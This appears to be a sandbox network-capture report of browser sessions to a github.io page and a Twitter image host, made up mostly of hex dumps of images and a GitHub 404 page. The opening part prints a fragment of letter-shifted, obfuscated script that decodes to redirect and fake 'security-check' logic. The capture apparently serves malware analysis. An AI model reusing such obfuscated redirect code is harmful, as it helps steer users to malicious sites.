                                                                                                                                                                                                                                                                                          Data Ascii: 75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75xjyYnrjtzy*7%3Dkzshynts*7%3D*7%3E*75*%3CG*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*7544*75Wjinwjhy*75ymj*75zxjw*75yt*75ymj*75xujhnknji*75ZWQ*5F*75*75*75*75*75*75*75*75*75*75*75*
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:51 UTC820INData Raw: 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 69 74 68 7a 72 6a 73 79 33 76 7a 6a 77 25 37 45 58 6a 71 6a 68 79 74 77 2a 37 25 33 44 2a 37 25 33 43 33 78 6a 68 7a 77 6e 79 25 37 45 32 68 6d 6a 68 70 2a 37 25 33 43 2a 37 25 33 45 33 78 79 25 37 45 71 6a 33 69 6e 78 75 71 66 25 37 45 2a 37 35 2a 38 49 2a 37 35 2a 37 25 33 43 67 71 74 68 70 2a 37 25 33 43 2a 38 47 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 25 33 43 49 2a 37 48 2a 37 35 25 33 41 35 35 35 2a 37 25 33 45 2a 38 47 2a 35 46 2a 35 46 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35 2a 37 35
                                                                                                                                                                                                                                                                                          Data Ascii: 5*75*75*75*75*75*75*75*75*75*75*75*75*75ithzrjsy3vzjw%7EXjqjhytw*7%3D*7%3C3xjhzwny%7E2hmjhp*7%3C*7%3E3xy%7Eqj3inxuqf%7E*75*8I*75*7%3Cgqthp*7%3C*8G*5F*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*75*%3CI*7H*75%3A555*7%3E*8G*5F*5F*75*75*75*75*75*75*75*75*75


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          9192.168.2.749737199.232.188.1594435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC622OUTGET /media/GGrR89_WgAAgrOI?format=jpg&name=large HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: pbs.twimg.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://sharedfiles2.github.io/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 39755
                                                                                                                                                                                                                                                                                          perf: 7402827104
                                                                                                                                                                                                                                                                                          cache-tag: media,media/bucket/3,media/1759449449804234752
                                                                                                                                                                                                                                                                                          content-type: image/jpeg
                                                                                                                                                                                                                                                                                          cache-control: max-age=604800, must-revalidate
                                                                                                                                                                                                                                                                                          last-modified: Mon, 19 Feb 2024 05:24:52 GMT
                                                                                                                                                                                                                                                                                          x-transaction-id: f067b583c6195c32
                                                                                                                                                                                                                                                                                          timing-allow-origin: https://twitter.com, https://mobile.twitter.com
                                                                                                                                                                                                                                                                                          strict-transport-security: max-age=631138519
                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                          access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:52 GMT
                                                                                                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                          x-tw-cdn: FT
                                                                                                                                                                                                                                                                                          x-served-by: cache-lhr-egll1980036-LHR, cache-muc13966-MUC, cache-tw-ZZZ1
                                                                                                                                                                                                                                                                                          Server-Timing: x-cache;desc=HIT, x-tw-cdn;desc=FT
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0b 0b 09 0c 11 0f 12 12 11 0f 11 11 13 16 1c 17 13 14 1a 15 11 11 18 21 18 1a 1d 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c2 00 11 08 02 76 07 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 07 01 04 03 02 08 ff c4 00 1b 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 03 06 02 04 05 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 d9 40 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: JFIFC!"$"$Cv0"@
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 2c 39 d2 7f 38 0e f0 3b ce f0 3a 39 d0 38 3b c0 eb 83 bc e8 e1 d3 8e f0 e9 c1 de 07 41 ce f0 03 a0 71 d3 80 eb 80 74 e1 d3 9d e7 47 00 ef 0e 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 1b 25 1b 24 79 c1 cb 25 6f a0 00 04 ec 14 ec 13 5b 2b 96 3a ef ce 6e dc 1c bd a0 00 02 5e 6e 12 6e d3 c9 3a e8 6b f1 d1 cf c7 e3 2a 2f 1e 1a 17 b0 bd 4f e3 97 d2 de e8 e3 bc 3b c0 3a 1c 74 e7 79 d3 8e 80 39 d0 e7 43 8e f0 3b c2 13 c9 53 8a 36 73 cc 7a 7b 48 b4 9e de 87 3a 1c 74 73 bc e9 c7 78 77 9d 1c 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: ,98;:98;AqtG%$y%o[+:n^nn:k*/O;:ty9C;S6sz{H:tsxwt
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 00 00 00 00 67 f5 6b 4d 58 d7 72 6d 97 05 36 ea 35 ce 00 f0 5e 32 ab 89 0a 83 d5 8f 16 41 b0 51 08 bd 52 af 7b 00 ae d7 7f 36 e2 81 a6 66 36 22 ee 08 7c e3 5f fe 70 34 fa ae b9 4d 24 2a 7f 3d 80 cb f5 0f e7 4f e8 52 0a bb 41 fe 83 32 9b df 70 b3 76 ce 35 ff 00 e7 03 4f aa eb 94 d2 42 a7 f3 d8 0c bf 50 fe 74 fe 81 20 60 69 da 11 5c d3 f0 5d 28 85 fb f8 a4 ca e5 d6 77 1c 36 0f e7 df e9 cf e7 13 51 be 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 e7 9e ad 68 86 35 ac 17 7a c2 0d 96 02 4e b4 42 eb 59 0d dc a2 56 f7 ea 71 65 a1 f3 f6 4b 5e e8 17 73 d0 0a f5 4e 9d b1 99 cd 9a bd 3c 5f 80 fe 73 fe 8c fe 73 3f
                                                                                                                                                                                                                                                                                          Data Ascii: gkMXrm65^2AQR{6f6"|_p4M$*=ORA2pv5OBPt `i\](w6Q(h5zNBYVqeK^sN<_ss?
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff c4 00 35 10 00 02 02 01 02 04 05 03 03 03 04 02 03 00 00 00 04 05 02 03 01 00 06 14 15 34 35 10 11 12 13 30 20 33 70 21 32 36 16 31 40 22 24 25 60 50 80 90 a0 c0 ff da 00 08 01 01 00 01 05 02 ff 00 dd 3b ac 8d 35 73 60 b5 cd 82
                                                                                                                                                                                                                                                                                          Data Ascii: 5450 3p!261@"$%`P;5s`
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 87 3e 78 45 7e 87 47 44 33 ab 52 55 65 ab 96 c0 3b 7c 4c 52 2d f9 92 1b 75 14 36 e8 45 22 d1 9d 67 1e 78 bd 15 59 d6 51 5f aa 50 fe a2 8d 48 d0 f0 2d 38 d7 66 48 6e d4 10 d9 e6 1a b1 47 cf 83 15 b0 32 ea 92 55 5d 9e 06 89 49 75 d8 86 cf 3a 90 cf ce b8 fa 2b fc 30 65 59 bc 6e 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e b9 25 ba e4 96 eb 92 5b ae 49 6e 96 ad 98 a4 9b 4e 6f a3 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 ae 55 66 b9 55 9a e5 56 6b 95 59 a5 e2 48 69 7e 50 22 cc 53 4f 37 ab 5c e2 ad 73 7a b5 cd ea d7 37 ab 5c de ad 73 8a b5 cd ea d7 37 ab 42 30 81 37 5d 66 2a 87 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 71 b0 d7 1b 0d 51 7e 2e cf e5 06 7d 07 c2 8f ae 3f a7 f8 56 fe ef aa 72 8c 23 73 91 21 9e 7d 56 ab 76 2c b4 3d f5 11 0f f2 18 b2 a8 3c 84 e2 ab
                                                                                                                                                                                                                                                                                          Data Ascii: >xE~GD3RUe;|LR-u6E"gxYQ_PH-8fHnG2U]Iu:+0eYnIn%[In%[InNoYUfUVkYUfUVkYHi~P"SO7\sz7\s7B07]f*qqqqQ~.}?Vr#s!}Vv,=<
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 95 6e 5e 67 92 36 f4 dd 44 25 99 33 22 78 3c 6b 52 ca 40 cb d6 74 16 c9 ca 72 c2 22 b2 c5 f0 66 c2 95 f0 27 74 93 6d a7 bf b6 76 c9 fb 91 6f fe a0 0f 0b 0b 72 f6 51 45 b8 ee b8 ad 3a 6e 3a c8 0d 76 e3 61 59 2d 9d ab bd 43 31 d9 52 cd 85 2b e0 4e e9 26 db 4f 7f 6c ed 93 f7 22 df fd 40 1e 16 16 e5 ec a2 8b 71 dd 71 5a 74 e2 b0 33 64 b7 54 e0 06 e6 22 ab e5 74 38 66 3b 9c 88 48 5d c5 98 2b 31 c3 fa b3 b6 dc e5 8e 1c 48 fc 08 44 6d 89 34 d9 b9 fd ef c6 3b eb b5 ec 7e ef ad d9 df d5 76 bd e3 d8 f6 27 59 bb 71 3c a2 da 6d e9 0e 37 c2 a2 c4 4a 35 82 2c df da d8 fd a3 c7 75 28 30 e2 92 8b 30 d5 ef 8b e8 b7 3b 2a 5e a4 de 2d e3 88 b6 04 4a 02 1f 7c 53 19 2e d9 02 d1 79 1a 6b 0c 0a e2 eb 23 55 02 fa 9a bd c7 e9 a7 41 e0 e5 aa 0b 98 2c 34 de 38 8b 60 44 a0 21 f7 c5
                                                                                                                                                                                                                                                                                          Data Ascii: n^g6D%3"x<kR@tr"f'tmvorQE:n:vaY-C1R+N&Ol"@qqZt3dT"t8f;H]+1HDm4;~v'Yq<m7J5,u(00;*^-J|S.yk#UA,48`D!
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 9f 16 dd b4 41 b4 57 57 60 d1 58 fb ed cf 63 c2 b0 62 f7 01 b0 93 7e 1d 56 5e 95 4e 2a b2 16 d5 ff 00 71 62 1d 67 6e e8 ed 75 d8 96 e8 ae 14 ed c7 1e ee 66 7d 0f 6c 0e eb a2 02 07 10 77 95 78 a4 62 36 a5 b8 7c b8 67 b7 e0 b0 8a a5 fc c5 db 34 e6 85 3b 82 91 88 5f 6e 1f 2e 19 f1 15 95 b5 5f 17 01 c1 71 07 79 56 77 f0 75 f0 8e 14 57 99 7f 47 03 ed f0 1b 2f d3 ec b6 ed 5b 47 d1 c8 97 e2 39 de 21 93 c9 f5 b5 85 e1 93 eb 76 0f ef a6 cf fc e9 81 dd cc a6 da 38 96 ec de bd 99 bf 75 af f9 b2 58 b3 99 d7 8a c2 6d f4 ce cc 2c dc a3 53 c0 d4 ab d5 70 5b 72 0e 32 b1 58 a4 c3 71 68 42 8f 38 85 b1 22 1b b9 14 71 fd 46 db 05 4b 77 38 19 c5 c1 01 1c c0 1d d7 fa b1 63 91 70 13 6c 0f 36 3b bb b0 b7 f7 65 23 e8 7b 60 65 d5 ed d2 c7 22 e0 27 f8 f5 93 b6 b3 cb 9a 5f fc d9 6c
                                                                                                                                                                                                                                                                                          Data Ascii: AWW`Xcb~V^N*qbgnuf}lwxb6|g4;_n._qyVwuWG/[G9!v8uXm,Sp[r2XqhB8"qFKw8cpl6;e#{`e"'_l
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: fd 7f 9a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 1a 8c ca f1 49 a1 16 af da 58 67 0c 5a a1 33 f4 6c 8c c5 f9 1c c5 f9 1c c5 f9 1c c5 f9 1c c2 cf 69 34 99 91 08 83 92 ab 2b 69 82 18 5b c6 43 0b 78 c8 61 6f 19 0c 2d e3 20 e2 93 49 22 4c b5 fb fe 9f 3f ff c4 00 4f 10 00 01 02 03 03 07 06 0c 03 05 05 06 07 00 00 00 01 02 03 00 04 11 12 21 31 05 10 13 22 32 41 71 33 42 51 61 72 91 14 20 23 30 52 70 73 81 82 a1 b1 c1 62 92 d1 15 34 40 43 f0 63 83 b2 c2 e1 24 50 60 74 a2 f1 53 80 90 a0 a3 c0 d2 ff da 00 08 01 01 00 06 3f 02 ff 00 ce 99 71 7b 23 18 e5 15 f9 63 94 57 e5 8e 51 5f 96 39 43 f9 63 94 57 e5 8e 51 5f 96 39 45 7e 58 e5 0f e5 8e 51 5f 96 34 6d 28 95 70 8b 6b 34 11 b6
                                                                                                                                                                                                                                                                                          Data Ascii: IXgZIXgZIXgZIXgZ3li4+i[Cxao- I"L?O!1"2Aq3BQar #0Rpsb4@Cc$P`tS?q{#cWQ_9CcWQ_9E~XQ_4m(pk4
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:52 UTC1379INData Raw: 43 dd b3 0b ec 67 33 4c 8a fa 63 ef 9a c8 72 d0 fc 57 c5 2d 25 1d 91 15 30 26 9e 14 03 60 42 fb 26 3c 8b 85 3d 51 7a 1a 3e e8 1a 52 28 30 02 12 d2 07 13 d1 01 23 00 29 06 69 a1 54 1d a1 d1 9a cd b0 b1 f8 84 59 b6 10 3f 08 cd e1 4f 0a 1e 60 fb e6 47 62 1a ed 8c ee 5d 72 8d a1 01 c6 d5 65 42 2c da 40 eb 09 86 c9 bc 94 8f 53 2f 70 f3 5f 09 83 c4 79 a7 38 78 ca 64 aa c8 3b e3 97 5f 74 21 a0 6b 64 53 32 da 56 0a 14 8e 5d 7d d0 12 9c 00 a6 6d 12 94 53 7d 6e 8e 5d 7d d0 86 41 a8 4e f8 0d a9 65 34 35 ba 39 75 f7 42 51 e8 8a 66 f2 a8 bf d2 18 c7 92 7c 53 f1 08 bd e6 e2 af 2c b9 d5 80 cc a5 e9 d7 ac 6b 84 17 12 e2 95 51 4b c7 89 68 55 a5 74 a6 35 5f 41 e2 23 59 f4 0e 02 2d 2a ae ab f1 66 20 ef 8a b2 f2 93 d4 6f 8e 59 b8 f2 cf fe 51 16 19 45 9f be 7b 48 ab 4a ea c2
                                                                                                                                                                                                                                                                                          Data Ascii: Cg3LcrW-%0&`B&<=Qz>R(0#)iTY?O`Gb]reB,@S/p_y8xd;_t!kdS2V]}mS}n]}ANe459uBQf|S,kQKhUt5_A#Y-*f oYQE{HJ


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          10192.168.2.749738185.199.110.1534435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC606OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sharedfiles2.github.io
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://sharedfiles2.github.io/feel1/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC635INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 9115
                                                                                                                                                                                                                                                                                          Server: GitHub.com
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                          permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                                                                          ETag: "66f42b03-239b"
                                                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
                                                                                                                                                                                                                                                                                          X-GitHub-Request-Id: F6F5:1E472F:CAADD4:DCC49C:66F6C3F5
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:40:53 GMT
                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                          X-Served-By: cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                          X-Timer: S1727448053.484068,VS0,VE16
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Fastly-Request-ID: 00e16721d9332e96212759a007ba433bbf6e0107
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 69 6d 67 2d 73 72 63 20 64 61 74 61 3a 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53
                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"> <title>S
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1378INData Raw: 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 32 64 70 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 31 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 73 75
                                                                                                                                                                                                                                                                                          Data Ascii: ice-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .logo-img-1x { display: none; } .logo-img-2x { display: inline-block; } } #su
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1378INData Raw: 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62
                                                                                                                                                                                                                                                                                          Data Ascii: x4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvb
                                                                                                                                                                                                                                                                                          2024-09-27 14:40:53 UTC1378INData Raw: 45 39 46 4e 72 67 77 42 43 4c 69 72 4d 46 56 39 4f 6b 68 35 65 66 6c 46 68 38 50 52 35 6e 4b 35 6e 44 61 62 72 52 32 42 4e 4a 6c 4b 4f 30 54 33 35 2b 4c 69 34 6e 34 2b 2f 4a 2b 2f 4a 51 43 78 68 6d 75 35 68 33 75 4a 6f 58 4e 48 50 62 6d 57 5a 41 48 4d 73 68 57 42 38 6c 35 2f 69 70 71 61 6d 6d 61 41 66 30 7a 50 44 44 78 31 4f 4e 56 33 76 75 72 64 69 64 71 77 41 51 4c 2b 70 45 63 38 73 4c 63 41 65 31 43 43 76 51 33 59 48 78 49 57 38 50 6c 38 35 78 53 57 4e 43 31 68 41 44 44 49 76 30 72 49 45 2f 6f 34 4a 30 6b 33 6b 77 77 34 78 53 6c 77 49 68 63 71 33 45 46 46 4f 6d 37 4b 4e 2f 68 55 47 4f 51 6b 74 30 43 46 61 35 57 70 4e 4a 6c 4d 76 78 42 45 7a 2f 49 56 51 41 78 67 2f 5a 52 5a 6c 39 77 69 48 41 36 33 79 44 59 69 65 4d 37 44 6e 4c 50 35 43 69 41 47 73 43 37
                                                                                                                                                                                                                                                                                          Data Ascii: E9FNrgwBCLirMFV9Okh5eflFh8PR5nK5nDabrR2BNJlKO0T35+Li4n4+/J+/JQCxhmu5h3uJoXNHPbmWZAHMshWB8l5/ipqammaAf0zPDDx1ONV3vurdidqwAQL+pEc8sLcAe1CCvQ3YHxIW8Pl85xSWNC1hADDIv0rIE/o4J0k3kww4xSlwIhcq3EFFOm7KN/hUGOQkt0CFa5WpNJlMvxBEz/IVQAxg/ZRZl9wiHA63yDYieM7DnLP5CiAGsC7
